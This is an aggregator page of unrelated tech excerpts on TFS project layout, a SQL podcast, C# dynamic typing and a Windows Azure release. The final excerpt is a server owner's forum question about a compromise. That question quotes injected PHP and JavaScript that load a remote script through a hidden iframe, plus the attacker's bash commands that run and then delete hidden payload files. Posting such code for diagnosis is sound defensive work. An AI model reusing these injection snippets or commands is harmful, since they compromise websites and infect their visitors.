    "In general, I believe this approach provides consistency [to multi-product engagements] and lowers the administration and maintenance costs. All good." - Michael Fourie, Visual Studio ALM MVP
    "@MrHinsh BTW, I'm very much a fan of very large, if not huge, team projects in TFS. Just FYI :) Use Areas & Iterations." - Ed Blankenship, Visual Studio ALM MVP
    This would mean that SSW would have a single Team Project called "SSW" that contains all of our internal projects, and consequently all of the Areas and Iterations move down one level in the hierarchy to accommodate this. Where we would have had "\SSW\Sprint 1" we now have "\SSW\SqlDeploy\Sprint 1", with "SqlDeploy" being our internal project. At the moment SSW has over 70 internal projects and more than 170 total projects in TFS. This method has long-term benefits that help to simplify the support model for companies that often have limited internal support time and many projects. But there are implications, as TFS does not provide this model "out-of-the-box". These implications stretch across Areas, Iterations, Queries, the Project Portal and Version Control.
    Michael made a good comment: "I agree with your approach, assuming that in a multi-product engagement with a client, they are happy to adopt the same process template across all products. If they are not, then it'll either be easy to convince them or there is a valid reason for having a different template." - Michael Fourie, Visual Studio ALM MVP
    At SSW we have a standard template that we use, and this is applied across the board to all of our projects. We even apply any changes to the core process template to all of our existing projects as well. If you have multiple projects for the same clients on multiple templates and you want to keep it that way, then this approach will not work for you. However, if you want to standardise as we have at SSW, then this approach may benefit you as well.
    Implications around Areas
    Areas should be used for topological classification/isolation of work items. You can think of this as architecture areas, organisational areas or even the main features of your application. In our scenario there is an additional top-level item that represents the Project/Product that we want to chop our Team Project into.
    Figure: Creating a sub area to represent a product/project is easy.
        <teamproject>
        <teamproject>\<Functional Area/module whatever>
    Becomes:
        <teamproject>
        <teamproject>\<ProjectName>\
        <teamproject>\<ProjectName>\<Functional Area/module whatever>
    Implications around Iterations
    Iterations should be used for chronological classification/isolation of work items. This could include isolated time boxes, milestones or release timelines, and really depends on the logical flow of your project or projects. Due to the new level in Area we need to add the same level to Iteration. This is primarily because it is unlikely that the sprints in each of your projects/products will start and end at the same time. This is just a reality of managing multiple projects.
    Figure: Adding the same Area value to Iteration as the top level item adds flexibility to Iteration.
        <teamproject>\Sprint 1
        Or
        <teamproject>\Release 1\Sprint 1
    Becomes:
        <teamproject>\<ProjectName>\Sprint 1
        Or
        <teamproject>\<ProjectName>\Release 1\Sprint 1
    Implications around Queries
    Queries are used to filter your work items based on a specified level of granularity. There are a number of queries that are built into a project created using the MSF Agile 5.0 template, but we now have multiple projects, and it would be a pain to have to edit all of the work items every time we changed project - and that would only allow one team to work on one project at a time.
    Figure: The Queries that are created in a normal MSF Agile 5.0 project do not quite suit our new needs.
    In order for project contributors to be able to query based on their project we need a couple of things. The first thing I did was to create an "_Area Template" folder that has a copy of the project layout with all the queries set up to filter based on the "_Area Template" Area and the "_Sprint template" you can see in the Area and Iteration views.
    Figure: The template is currently easy to drag and drop, but you then need to edit the queries to point at the right Area and Iteration. This needs a tool.
    I then created an "Areas" folder to hold all of the area-specific queries. So, when you go to create a new TFS sub-project you just drag "_Area Template" while holding "Ctrl" and drop it onto "Areas". There is a little setup here. That said, I managed it in around 10 minutes, which is not so bad, and I can imagine it being quite easy to build a tool to create these queries.
    Figure: These new queries can be configured in around 10 minutes, which includes setting up the Area and Iteration as well.
    Version Control
    What about your source code? Well, that is the easiest of the lot. Just create a sub folder for each of your projects/products.
    Figure: Creating sub folders in source control is as easy as "Right click | Create new folder".
        <teamproject>\DEV\Main\
    Becomes:
        <teamproject>\<ProjectName>\DEV\Main\
    Conclusion
    I think it is up to each company to make a call on how you want to configure your Team Projects, and it depends completely on how many projects/products you are going to have for each customer, including yourself. If we decide to utilise this route it will require some configuration to get our 170+ projects into this format, and I will probably be writing some tools to help.
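    To make the query setup under "Implications around Queries" concrete, here is a WIQL sketch of mine (not from the original post) scoped to one sub-project; the project and area names reuse the SSW examples above:
        SELECT [System.Id], [System.Title], [System.State]
        FROM WorkItems
        WHERE [System.TeamProject] = 'SSW'
          AND [System.AreaPath] UNDER 'SSW\SqlDeploy'
          AND [System.IterationPath] UNDER 'SSW\SqlDeploy\Sprint 1'
    The UNDER operator is what lets a single saved query cover a sub-project's whole area subtree.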
    Pros
    - You only have one project to upgrade when a process template changes – After going through an upgrade of over 170 projects prior to the changes in the RC, I can tell you that that many projects is no fun.
    - Standardises your Process Template – You will always have the same process implementation across projects/products without exception.
    - You get tighter control over the permissions – Yes, you can do this on a standard Team Project, but it gets a lot easier with practice.
    - You can "move" work items from one "product" to another – Have we not always wanted to do that?
    - You can rename your projects – Wahoo: everyone wants to do this, now you can.
    - One set of Reporting Services reports to manage – You set an area and iteration to run reports anyway, so you may as well set both.
    - Simplified check-in policies – There is only one set of check-in policies per client. This simplifies administration of policies.
    - Simplified alerts – As alerts are applied across multiple projects, this simplifies your alert rules per client.
    Cons
    All of these cons could be mitigated by a custom tool that helps automate creation of "sub-projects" within Team Projects. This custom tool could create areas, iterations, permissions, SharePoint and queries. It just does not exist yet :)
    - You need to configure the Areas and Iterations.
    - You need to configure the permissions.
    - You may need to configure sub sites for SharePoint (depends on your requirements) – If you have two projects/products in the same Team Project then you will not see the burndown for each one out-of-the-box, but rather a cumulative for the Team Project. This is not really that much of a problem, as you would have to configure your burndown graphs for your current iteration anyway. Note: when you create a sub site of a TFS-linked portal it will inherit the settings of its parent site :) This is fantastic, as it means that you can easily create sub sites and then set the Area and Iteration path in each of the reports to be the correct one.
    - Every team wants their own customization (via Ewald Hofman) – Small teams of 2 persons against teams of 30, or even outsourcing, need their own process; you cannot allow that, because everybody gets the same work item types. Note: luckily at SSW this is not a problem, as our template is standardised across all projects and customers.
    - Large list of builds (via Ewald Hofman) – As the build list in Team Explorer is just a flat list, it can get very cluttered. Note: I would mitigate this by removing any build that has not been run in over 30 days. The build template and workflow will still be available in version control, but it will clean the list.
    Feedback
    Now that I have explained this method, what do you think? What other pros and cons can you see? What do you think of this approach? Will you be using it? What tools would you like to support you?
    Technorati Tags: Visual Studio ALM, TFS Administration, TFS, Team Foundation Server, Project Planning, TFS Customisation

    Read the article

  • SQLBeat Podcast – Episode 5 – Kevin Kline Talks With Me About SQL, Professional Development and Book Writin’

    - by SQLBeat
    I thought I would be a ball of intimidated nerves when Kevin gladly agreed to speak with me on the podcast this past weekend. After all, he is Kevin Kline of SQL in a Nutshell fame! As it turned out, we had a comfortable and enlightening conversation on Apple MacBooks (is that what they are called?), our beginnings in the industry, the Deep South, health care initiatives and 286s. I almost pulled the plug when Kevin started down the Oracle path though, and for a moment he looked at me as if I was serious. As always on this podcast, it is all in good fun. The picture is of Kevin and me (my shirt is mauve, not pink, by the way) at the after party for SQL Saturday 151 in Orlando, FL, where he also did a Pre-Con to a sold-out crowd of enthusiastic DBAs. I know they were enthusiastic, even though I was not there, because one of the attendees was a friend of mine who went on and on and on about the content - kind of like I am doing here. So I will just stop that and let you proceed to listen. As always, I hope you enjoy, and any feedback on this or future episodes is always welcome. Download the MP3

    Read the article

  • C# 4.0: Dynamic Programming

    - by Paulo Morgado
    The major feature of C# 4.0 is dynamic programming - not just dynamic typing, but dynamic in a broader sense, which means talking to anything that is not statically typed to be a .NET object.
    Dynamic Language Runtime
    The Dynamic Language Runtime (DLR) is a piece of technology that unifies dynamic programming on the .NET platform, the same way the Common Language Runtime (CLR) has been a common platform for statically typed languages. The CLR always had dynamic capabilities: you could always use reflection, but its main goal was never to be a dynamic programming environment, and there were some features missing. The DLR is built on top of the CLR and adds those missing features to the .NET platform. The Dynamic Language Runtime is the core infrastructure that consists of:
    Expression Trees - The same expression trees used in LINQ, now improved to support statements.
    Dynamic Dispatch - Dispatches invocations to the appropriate binder.
    Call Site Caching - For improved efficiency.
    Dynamic languages and languages with dynamic capabilities are built on top of the DLR. IronPython and IronRuby were already built on top of the DLR, and now support for using the DLR is being added to C# and Visual Basic. Other languages built on top of the CLR are expected to also use the DLR in the future. Underneath the DLR there are binders that talk to a variety of different technologies:
    .NET Binder - Allows you to talk to .NET objects.
    JavaScript Binder - Allows you to talk to JavaScript in Silverlight.
    IronPython Binder - Allows you to talk to IronPython.
    IronRuby Binder - Allows you to talk to IronRuby.
    COM Binder - Allows you to talk to COM.
    With all these binders it is possible to have a single programming experience for talking to all these environments that are not statically typed .NET objects.
    The dynamic Static Type
    Let's take this traditional statically typed code:
        Calculator calculator = GetCalculator();
        int sum = calculator.Add(10, 20);
    Because the variable that receives the return value of the GetCalculator method is statically typed to be of type Calculator and, because the Calculator type has an Add method that receives two integers and returns an integer, it is possible to call that Add method and assign its return value to a variable statically typed as integer. Now let's suppose the calculator was not a statically typed .NET class but, instead, a COM object or some .NET code we don't know the type of. All of a sudden it gets very painful to call the Add method:
        object calculator = GetCalculator();
        Type calculatorType = calculator.GetType();
        object res = calculatorType.InvokeMember("Add", BindingFlags.InvokeMethod, null, calculator, new object[] { 10, 20 });
        int sum = Convert.ToInt32(res);
    And what if the calculator was a JavaScript object?
        ScriptObject calculator = GetCalculator();
        object res = calculator.Invoke("Add", 10, 20);
        int sum = Convert.ToInt32(res);
    For each dynamic domain we have a different programming experience, and that makes it very hard to unify the code. With C# 4.0 it becomes possible to write code this way:
        dynamic calculator = GetCalculator();
        int sum = calculator.Add(10, 20);
    You simply declare a variable whose static type is dynamic. dynamic is a pseudo-keyword (like var) that indicates to the compiler that operations on the calculator object will be done dynamically. The way you should look at dynamic is that it's just like object (System.Object) with dynamic semantics associated. Anything can be assigned to a dynamic:
        dynamic x = 1;
        dynamic y = "Hello";
        dynamic z = new List<int> { 1, 2, 3 };
    At run-time, all objects will have a type. In the above example x is of type System.Int32. When one or more operands in an operation are typed dynamic, member selection is deferred to run-time instead of compile-time. Then the run-time type is substituted in all variables and normal overload resolution is done, just like it would happen at compile-time. The result of any dynamic operation is always dynamic and, when a dynamic object is assigned to something else, a dynamic conversion will occur.
        Code: double x = 1.75; double y = Math.Abs(x);    Resolution: compile-time    Method: double Abs(double x)
        Code: dynamic x = 1.75; dynamic y = Math.Abs(x);  Resolution: run-time        Method: double Abs(double x)
        Code: dynamic x = 2; dynamic y = Math.Abs(x);     Resolution: run-time        Method: int Abs(int x)
    The above code will always be strongly typed. The difference is that, in the first case, the method resolution is done at compile-time, and in the others it's done at run-time.
    IDynamicMetaObjectProvider
    The DLR is pre-wired to know .NET objects, COM objects and so forth, but any dynamic language can implement its own objects, and you can implement your own objects in C# through the implementation of the IDynamicMetaObjectProvider interface. When an object implements IDynamicMetaObjectProvider, it can participate in the resolution of how method calls and property accesses are done. The .NET Framework already provides two implementations of IDynamicMetaObjectProvider:
    DynamicObject : IDynamicMetaObjectProvider - The DynamicObject class enables you to define which operations can be performed on dynamic objects and how to perform those operations. For example, you can define what happens when you try to get or set an object property, call a method, or perform standard mathematical operations such as addition and multiplication.
    ExpandoObject : IDynamicMetaObjectProvider - The ExpandoObject class enables you to add and delete members of its instances at run time and also to set and get values of these members. This class supports dynamic binding, which enables you to use standard syntax like sampleObject.sampleMember instead of more complex syntax like sampleObject.GetAttribute("sampleMember").
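    To make the last two types concrete, here is a small self-contained sketch of my own (not from the original post) that exercises ExpandoObject and a minimal DynamicObject subclass:
        using System;
        using System.Collections.Generic;
        using System.Dynamic;

        class Bag : DynamicObject
        {
            private readonly Dictionary<string, object> values = new Dictionary<string, object>();

            // Invoked for reads of dynamically dispatched members.
            public override bool TryGetMember(GetMemberBinder binder, out object result)
            {
                return values.TryGetValue(binder.Name, out result);
            }

            // Invoked for writes to dynamically dispatched members.
            public override bool TrySetMember(SetMemberBinder binder, object value)
            {
                values[binder.Name] = value;
                return true;
            }
        }

        class Program
        {
            static void Main()
            {
                dynamic expando = new ExpandoObject();
                expando.SampleMember = 42;                // member created at run time
                Console.WriteLine(expando.SampleMember);  // 42

                dynamic bag = new Bag();
                bag.Greeting = "Hello";                   // routed through TrySetMember
                Console.WriteLine(bag.Greeting);          // routed through TryGetMember
            }
        }
    Both objects defer member binding to run time: ExpandoObject grows members on assignment, while Bag decides for itself how gets and sets are satisfied.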

    Read the article

  • Windows Azure: Backup Services Release, Hyper-V Recovery Manager, VM Enhancements, Enhanced Enterprise Management Support

    - by ScottGu
    This morning we released a huge set of updates to Windows Azure. These new capabilities include:
    - Backup Services: General Availability of Windows Azure Backup Services
    - Hyper-V Recovery Manager: Public preview of Windows Azure Hyper-V Recovery Manager
    - Virtual Machines: Delete Attached Disks, Availability Set Warnings, SQL AlwaysOn Configuration
    - Active Directory: Securely manage hundreds of SaaS applications
    - Enterprise Management: Use Active Directory to Better Manage Windows Azure
    - Windows Azure SDK 2.2: A massive update of our SDK + Visual Studio tooling support
    All of these improvements are now available to use immediately. Below are more details about them.
    Backup Service: General Availability Release of Windows Azure Backup
    Today we are releasing Windows Azure Backup Service as a general availability service. This release is now live in production, backed by an enterprise SLA, supported by Microsoft Support, and is ready to use for production scenarios. Windows Azure Backup is a cloud-based backup solution for Windows Server which allows files and folders to be backed up and recovered from the cloud, and provides off-site protection against data loss. The service provides IT administrators and developers with the option to back up and protect critical data in an easily recoverable way from any location with no upfront hardware cost. Windows Azure Backup is built on the Windows Azure platform and uses Windows Azure blob storage for storing customer data. Windows Server uses the downloadable Windows Azure Backup Agent to transfer file and folder data securely and efficiently to the Windows Azure Backup Service. Along with providing cloud backup for Windows Server, the Windows Azure Backup Service also provides the capability to back up data from System Center Data Protection Manager and Windows Server Essentials to the cloud. All data is encrypted onsite before it is sent to the cloud, and customers retain and manage the encryption key (meaning the data is stored entirely secured and can't be decrypted by anyone but yourself).
    Getting Started
    To get started with the Windows Azure Backup Service, create a new Backup Vault within the Windows Azure Management Portal. Click New->Data Services->Recovery Services->Backup Vault to do this. Once the backup vault is created you'll be presented with a simple tutorial that will help guide you on how to register your Windows Servers with it. Once the servers you want to back up are registered, you can use the appropriate local management interface (such as the Microsoft Management Console snap-in, System Center Data Protection Manager Console, or Windows Server Essentials Dashboard) to configure the scheduled backups and to optionally initiate recoveries. You can follow these tutorials to learn more about how to do this:
    - Tutorial: Schedule Backups Using the Windows Azure Backup Agent. This tutorial helps you with setting up a backup schedule for your registered Windows Servers. Additionally, it also explains how to use Windows PowerShell cmdlets to set up a custom backup schedule.
    - Tutorial: Recover Files and Folders Using the Windows Azure Backup Agent. This tutorial helps you with recovering data from a backup. Additionally, it also explains how to use Windows PowerShell cmdlets to do the same tasks.
    Below are some of the key benefits the Windows Azure Backup Service provides:
    - Simple configuration and management. The Windows Azure Backup Service integrates with the familiar Windows Server Backup utility in Windows Server, the Data Protection Manager component in System Center and Windows Server Essentials, in order to provide a seamless backup and recovery experience to a local disk, or to the cloud.
    - Block-level incremental backups. The Windows Azure Backup Agent performs incremental backups by tracking file and block-level changes and only transferring the changed blocks, hence reducing the storage and bandwidth utilization. Different point-in-time versions of the backups use storage efficiently by only storing the changed blocks between these versions.
    - Data compression, encryption and throttling. The Windows Azure Backup Agent ensures that data is compressed and encrypted on the server before being sent to the Windows Azure Backup Service over the network. As a result, the Windows Azure Backup Service only stores encrypted data in cloud storage. The encryption key is not available to the Windows Azure Backup Service, and as a result the data is never decrypted in the service. Also, users can set up throttling and configure how the Windows Azure Backup Service utilizes the network bandwidth when backing up or restoring information.
    - Data integrity is verified in the cloud. In addition to the secure backups, the backed-up data is also automatically checked for integrity once the backup is done. As a result, any corruptions which may arise due to data transfer can be easily identified and are fixed automatically.
    - Configurable retention policies for storing data in the cloud. The Windows Azure Backup Service accepts and implements retention policies to recycle backups that exceed the desired retention range, thereby meeting business policies and managing backup costs.
    Hyper-V Recovery Manager: Now Available in Public Preview
    I'm excited to also announce the public preview of a new Windows Azure Service – the Windows Azure Hyper-V Recovery Manager (HRM). Windows Azure Hyper-V Recovery Manager helps protect your business-critical services by coordinating the replication and recovery of System Center Virtual Machine Manager 2012 SP1 and System Center Virtual Machine Manager 2012 R2 private clouds at a secondary location. With automated protection, asynchronous ongoing replication, and orderly recovery, the Hyper-V Recovery Manager service can help you implement Disaster Recovery and restore important services accurately, consistently, and with minimal downtime. Application data in Hyper-V Recovery Manager scenarios always travels on your on-premise replication channel. Only metadata (such as names of logical clouds, virtual machines, networks etc.) that is needed for orchestration is sent to Azure. All traffic sent to/from Azure is encrypted. You can begin using Windows Azure Hyper-V Recovery today by clicking New->Data Services->Recovery Services->Hyper-V Recovery Manager within the Windows Azure Management Portal. You can read more about Windows Azure Hyper-V Recovery Manager in Brad Anderson's 9-part series, Transform the datacenter. To learn more about setting up Hyper-V Recovery Manager, follow our detailed step-by-step guide.
    Virtual Machines: Delete Attached Disks, Availability Set Warnings, SQL AlwaysOn
    Today's Windows Azure release includes a number of nice updates to Windows Azure Virtual Machines.
These improvements include: Ability to Delete both VM Instances + Attached Disks in One Operation Prior to today’s release, when you deleted VMs within Windows Azure we would delete the VM instance – but not delete the drives attached to the VM.  You had to manually delete these yourself from the storage account.  With today’s update we’ve added a convenience option that now allows you to either retain or delete the attached disks when you delete the VM:   We’ve also added the ability to delete a cloud service, its deployments, and its role instances with a single action. This can either be a cloud service that has production and staging deployments with web and worker roles, or a cloud service that contains virtual machines.  To do this, simply select the Cloud Service within the Windows Azure Management Portal and click the “Delete” button: Warnings on Availability Sets with Only One Virtual Machine In Them One of the nice features that Windows Azure Virtual Machines supports is the concept of “Availability Sets”.  An “availability set” allows you to define a tier/role (e.g. webfrontends, databaseservers, etc) that you can map Virtual Machines into – and when you do this Windows Azure separates them across fault domains and ensures that at least one of them is always available during servicing operations.  This enables you to deploy applications in a high availability way. One issue we’ve seen some customers run into is where they define an availability set, but then forget to map more than one VM into it (which defeats the purpose of having an availability set).  With today’s release we now display a warning in the Windows Azure Management Portal if you have only one virtual machine deployed in an availability set to help highlight this: You can learn more about configuring the availability of your virtual machines here. Configuring SQL Server Always On SQL Server Always On is a great feature that you can use with Windows Azure to enable high availability and DR scenarios with SQL Server. Today’s Windows Azure release makes it even easier to configure SQL Server Always On by enabling “Direct Server Return” endpoints to be configured and managed within the Windows Azure Management Portal.  Previously, setting this up required using PowerShell to complete the endpoint configuration.  Starting today you can enable this simply by checking the “Direct Server Return” checkbox: You can learn more about how to use direct server return for SQL Server AlwaysOn availability groups here. Active Directory: Application Access Enhancements This summer we released our initial preview of our Application Access Enhancements for Windows Azure Active Directory.  This service enables you to securely implement single-sign-on (SSO) support against SaaS applications (including Office 365, SalesForce, Workday, Box, Google Apps, GitHub, etc) as well as LOB based applications (including ones built with the new Windows Azure AD support we shipped last week with ASP.NET and VS 2013). Since the initial preview we’ve enhanced our SAML federation capabilities, integrated our new password vaulting system, and shipped multi-factor authentication support. We've also turned on our outbound identity provisioning system and have it working with hundreds of additional SaaS Applications: Earlier this month we published an update on dates and pricing for when the service will be released in general availability form.  
In this blog post we announced our intention to release the service in general availability form by the end of the year. We also announced that the features below will be available in a free tier:

SSO to every SaaS app we integrate with – Users can single sign-on to any app we are integrated with at no charge. This includes all the top SaaS apps and every app in our application gallery, whether they use federation or password vaulting.

Application access assignment and removal – IT admins can assign access privileges for web applications to the users in their Active Directory, assuring that every employee has access to the SaaS apps they need. And when a user leaves the company or changes jobs, the admin can just as easily remove their access privileges, assuring data security and minimizing IP loss.

User provisioning (and de-provisioning) – IT admins will be able to automatically provision users in 3rd party SaaS applications like Box, Salesforce.com, GoToMeeting, DropBox and others. We are working with key partners in the ecosystem to establish these connections, meaning you no longer have to continually update user records in multiple systems.

Security and auditing reports – Security is a key priority for us. With the free version of these enhancements you'll get access to our standard set of access reports, giving you visibility into which users are using which applications, when they were using them, and where they are using them from. In addition, we'll alert you to unusual usage patterns, for instance when a user logs in from multiple locations at the same time.

Our Application Access Panel – Users are logging in from every type of device, including Windows, iOS, and Android. Not all of these devices handle authentication in the same manner, but the user doesn't care: they need to access their apps from the devices they love. Our Application Access Panel will support the ability for users to access and launch their apps from any device, anywhere.

You can learn more about our plans for application management with Windows Azure Active Directory here. Try out the preview and start using it today.

Enterprise Management: Use Active Directory to Better Manage Windows Azure

Windows Azure Active Directory provides the ability to manage your organization in a directory which is hosted entirely in the cloud, or alternatively kept in sync with an on-premises Windows Server Active Directory solution (allowing you to seamlessly integrate with the directory you already have). With today's Windows Azure release we are integrating Windows Azure Active Directory even more within the core Windows Azure management experience, and enabling an even richer enterprise security offering. Specifically:

1) All Windows Azure accounts now have a default Windows Azure Active Directory created for them. You can create and map any users you want into this directory, and grant administrative rights to manage resources in Windows Azure to these users.

2) You can keep this directory entirely hosted in the cloud – or optionally sync it with your on-premises Windows Server Active Directory. Both options are free. The latter approach is ideal for companies that wish to use their corporate user identities to sign in and manage Windows Azure resources. It also ensures that if an employee leaves an organization, his or her access control rights to the company's Windows Azure resources are immediately revoked.
3) The Windows Azure Service Management APIs have been updated to support using Windows Azure Active Directory credentials to sign in and perform management operations. Prior to today's release, customers had to download and use management certificates (which were not scoped to individual users) to perform management operations. We still support this management certificate approach (don't worry – nothing will stop working). But we think the new Windows Azure Active Directory authentication support enables an even easier and more secure way for customers to manage resources going forward.

4) The Windows Azure SDK 2.2 release (which is also shipping today) includes built-in support for the new Service Management APIs that authenticate with Windows Azure Active Directory, and now allows you to create and manage Windows Azure applications and resources directly within Visual Studio using your Active Directory credentials. This, combined with updated PowerShell scripts that also support Active Directory, enables an end-to-end enterprise authentication story with Windows Azure.

Below are some details on how all of this works:

Subscriptions within a Directory

As part of today's update, we have associated all existing Windows Azure accounts with a Windows Azure Active Directory (and created one for you if you don't already have one). When you log in to the Windows Azure Management Portal you'll now see the directory name in the URI of the browser. For example, in the screenshot below you can see that I have a "scottgu" directory that my subscriptions are hosted within.

Note that you can continue to use Microsoft Accounts (formerly known as Microsoft Live IDs) to sign in to Windows Azure. These map just fine to a Windows Azure Active Directory – so there is no need to create new usernames that are specific to a directory if you don't want to. In the scenario above I'm actually logged in using my @hotmail.com based Microsoft ID, which is now mapped to a "scottgu" Active Directory that was created for me. By default everything will continue to work just as it did before.

Manage your Directory

You can manage an Active Directory (including the one we now create for you by default) by clicking the "Active Directory" tab on the left-hand side of the portal. This will list all of the directories in your account. Clicking one the first time will display a getting-started page that provides documentation and links to perform common tasks with it.

You can use the built-in directory management support within the Windows Azure Management Portal to add/remove/manage users within the directory, enable multi-factor authentication, associate a custom domain (e.g. mycompanyname.com) with the directory, and/or rename the directory to whatever friendly name you want (just click the configure tab to do this). You can also set up the directory to automatically sync with an on-premises Active Directory using the "Directory Integration" tab.

Note that users within a directory do not by default have admin rights to log in to or manage Windows Azure based resources. You still need to explicitly grant them co-admin permissions on a subscription for them to log in or manage resources in Windows Azure. You can do this by clicking the Settings tab on the left-hand side of the portal and then the Administrators tab within it.
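To give a feel for what the new Active Directory based Service Management authentication can look like in code, here is a minimal sketch using the new Windows Azure Management Libraries for .NET together with the Active Directory Authentication Library (ADAL). The tenant name, client ID, redirect URI, and subscription ID below are all placeholders you would substitute with your own values:

using System;
using Microsoft.IdentityModel.Clients.ActiveDirectory; // ADAL NuGet package
using Microsoft.WindowsAzure;
using Microsoft.WindowsAzure.Management.Compute;

class AadManagementSketch
{
    static void Main()
    {
        // Sign in with an organizational account instead of a management certificate.
        // The tenant, client ID and redirect URI here are hypothetical placeholders.
        var authContext = new AuthenticationContext("https://login.windows.net/contoso.onmicrosoft.com");
        AuthenticationResult result = authContext.AcquireToken(
            "https://management.core.windows.net/",  // Service Management API resource
            "11111111-2222-3333-4444-555555555555",  // placeholder native client app ID
            new Uri("http://localhost/myapp"));      // placeholder redirect URI

        // The token is scoped to the signed-in user, unlike a shared management certificate.
        var credentials = new TokenCloudCredentials(
            "your-subscription-id", result.AccessToken);

        using (var compute = new ComputeManagementClient(credentials))
        {
            // List the cloud services the signed-in user is allowed to manage.
            foreach (var service in compute.HostedServices.List())
            {
                Console.WriteLine(service.ServiceName);
            }
        }
    }
}

Because the token is issued to an individual user in the directory, access can be revoked centrally by removing the user or their co-admin rights; a downloaded management certificate offers no equivalent.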
Sign-In Integration within Visual Studio

If you install the new Windows Azure SDK 2.2 release, you can now connect to Windows Azure from directly inside Visual Studio without having to download any management certificates. Just right-click on the "Windows Azure" icon within the Server Explorer and choose the "Connect to Windows Azure" context menu option.

Doing this will prompt you to enter the email address of the username you wish to sign in with (make sure this account is a user in your directory with co-admin rights on a subscription). You can use either a Microsoft Account (e.g. Windows Live ID) or an Active Directory based organizational account as the email. The dialog will update with an appropriate login prompt depending on which type of email address you enter.

Once you sign in, you'll see the Windows Azure resources that you have permissions to manage show up automatically within the Visual Studio Server Explorer, available to start using. No downloading of management certificates required – all of the authentication was handled using your Windows Azure Active Directory!

Manage Subscriptions across Multiple Directories

If you already have multiple directories and multiple subscriptions within your Windows Azure account, we have done our best to create a good default mapping of your subscriptions to directories as part of today's update. If you don't like the default subscription-to-directory mapping we have done, you can click the Settings tab in the left-hand navigation of the Windows Azure Management Portal and browse to the Subscriptions tab within it.

If you want to map a subscription to a different directory in your account, simply select the subscription from the list, and then click the "Edit Directory" button to choose which directory to map it to. Mapping a subscription to a different directory takes only seconds and will not cause any of the resources within the subscription to recycle or stop working. We've made the directory-to-subscription mapping process self-service so that you always have complete control and can map things however you want.

Filtering by Directory and Subscription

Within the Windows Azure Management Portal you can filter resources in the portal by subscription (allowing you to show/hide different subscriptions). If you have subscriptions mapped to multiple directory tenants, we also now have a filter drop-down that allows you to filter the subscription list by directory tenant. This filter is only available if you have multiple subscriptions mapped to multiple directories within your Windows Azure account.

Windows Azure SDK 2.2

Today we are also releasing a major update of our Windows Azure SDK. The Windows Azure SDK 2.2 release adds some great new features, including:

Visual Studio 2013 Support
Integrated Windows Azure Sign-In support within Visual Studio
Remote Debugging Cloud Services with Visual Studio
Firewall Management support within Visual Studio for SQL Databases
Visual Studio 2013 RTM VM Images for MSDN Subscribers
Windows Azure Management Libraries for .NET
Updated Windows Azure PowerShell Cmdlets and ScriptCenter

I'll post a follow-up blog shortly with more details about all of the above.
Additional Updates

In addition to the above enhancements, today's release also includes a number of additional improvements:

AutoScale: Richer time and date based scheduling support (set different rules on different dates)
AutoScale: Ability to scale to zero virtual machines (very useful for dev/test scenarios)
AutoScale: Support for time-based scheduling of Mobile Service AutoScale rules
Operation Logs: Auditing support for Service Bus management operations

Today we also shipped a major update to the Windows Azure SDK – Windows Azure SDK 2.2. It has so much goodness in it that I have a whole second blog post coming shortly on it! :-)

Summary

Today's Windows Azure release enables a bunch of great new scenarios, and delivers a much richer enterprise authentication offering.

If you don't already have a Windows Azure account, you can sign up for a free trial and start using all of the above features today. Then visit the Windows Azure Developer Center to learn more about how to build apps with it.

Hope this helps,

Scott

P.S. In addition to blogging, I am also now using Twitter for quick updates and to share links. Follow me at: twitter.com/scottgu

    Read the article

  • Mass targeted malware installed - g00glestatic.com [closed]

    - by Silver89
Possible Duplicate: My server's been hacked EMERGENCY

I run a webserver which over the last few days seems to have become infected with malware that tries to include content from "http://g00glestatic.com/s.js".

It appears the attacker gained access to one of the user accounts (not root), made a few changes, added a few files and ran a few bash commands. These changes stuck out clearly to me because it is not a shared server and I am the only person with access, through very secure passwords.

The PHP/JavaScript code that was added

In .php files, this code was added:

#9c282e# if(!$srvc_counter) { echo "<script type=\"text/javascript\" src=\"http://g00glestatic.com/s.js\"></script>"; $srvc_counter = true;} #/9c282e#

In .js files, this code was added:

/*9c282e*/
var _f = document.createElement('iframe'),_r = 'setAttribute';
_f[_r]('src', 'http://g00glestatic.com/s.js');
_f.style.position = 'absolute';
_f.style.width = '10px';
_f[_r]('frameborder', navigator.userAgent.indexOf('bf3f1f8686832c30d7c764265f8e7ce8') + 1);
_f.style.left = '-5540px';
document.write('<div id=\'MIX_ADS\'></div>');
document.getElementById('MIX_ADS').appendChild(_f);
/*/9c282e*/

The bash commands taken from .bash_history (some usernames/passwords have been substituted):

su -c id $replacedPassword id; id; sudo id; replacedPassword id;
cd /home/replacedUserId1; chmod +x .sess_28e2f1bc755ed3ca48b32fbcb55b91a7; ./.sess_28e2f1bc755ed3ca48b32fbcb55b91a7; rm /home/replacedUserId1/.sess_28e2f1bc755ed3ca48b32fbcb55b91a7; id;
cd /home/replacedUserId1; chmod +x .sess_05ee5257fed0ac8e0f12096f4c3c0d20; ./.sess_05ee5257fed0ac8e0f12096f4c3c0d20; rm /home/replacedUserId1/.sess_05ee5257fed0ac8e0f12096f4c3c0d20; id;
cd /home/replacedUserId1; chmod +x .sess_bfa542fc2578cce68eb373782c5689b9; ./.sess_bfa542fc2578cce68eb373782c5689b9; rm /home/replacedUserId1/.sess_bfa542fc2578cce68eb373782c5689b9; id;
cd /home/replacedUserId1; chmod +x .sess_bfa542fc2578cce68eb373782c5689b9; ./.sess_bfa542fc2578cce68eb373782c5689b9; rm /home/replacedUserId1/.sess_bfa542fc2578cce68eb373782c5689b9; id;
cd /home/replacedUserId1; chmod +x .sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; ./.sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; rm /home/replacedUserId1/.sess_fb19dfb52ed4a3ae810cd4454ac6ef1e; id;
kill -9 $$;; kill -9 $$;; kill -9 $$;

The above seems to move files added to public_html to the level above?

I also have all 4 of the files that were added:

.sess_28e2f1bc755ed3ca48b32fbcb55b91a7
.sess_05ee5257fed0ac8e0f12096f4c3c0d20
.sess_bfa542fc2578cce68eb373782c5689b9
.sess_fb19dfb52ed4a3ae810cd4454ac6ef1e

Of those four files, three are not viewable in Notepad++ and display null characters, whereas .sess_fb19dfb52ed4a3ae810cd4454ac6ef1e consists of:

#!/bin/sh
export PATH=$PATH:/sbin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/bin;
export LC_ALL=en_US.UTF-8 LC_COLLATE=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 LANG=en_US.UTF-8 LANGUAGE=en_US.UTF-8
export TERM=linux
echo -n "-> checking staprun: ";
if which staprun 2>&1 | grep -q "no $1"; then
flag=1
elif [ -z "`which $1 2>&1`" ]; then
flag=1;
fi
if [ "$flag" = "1" ]; then
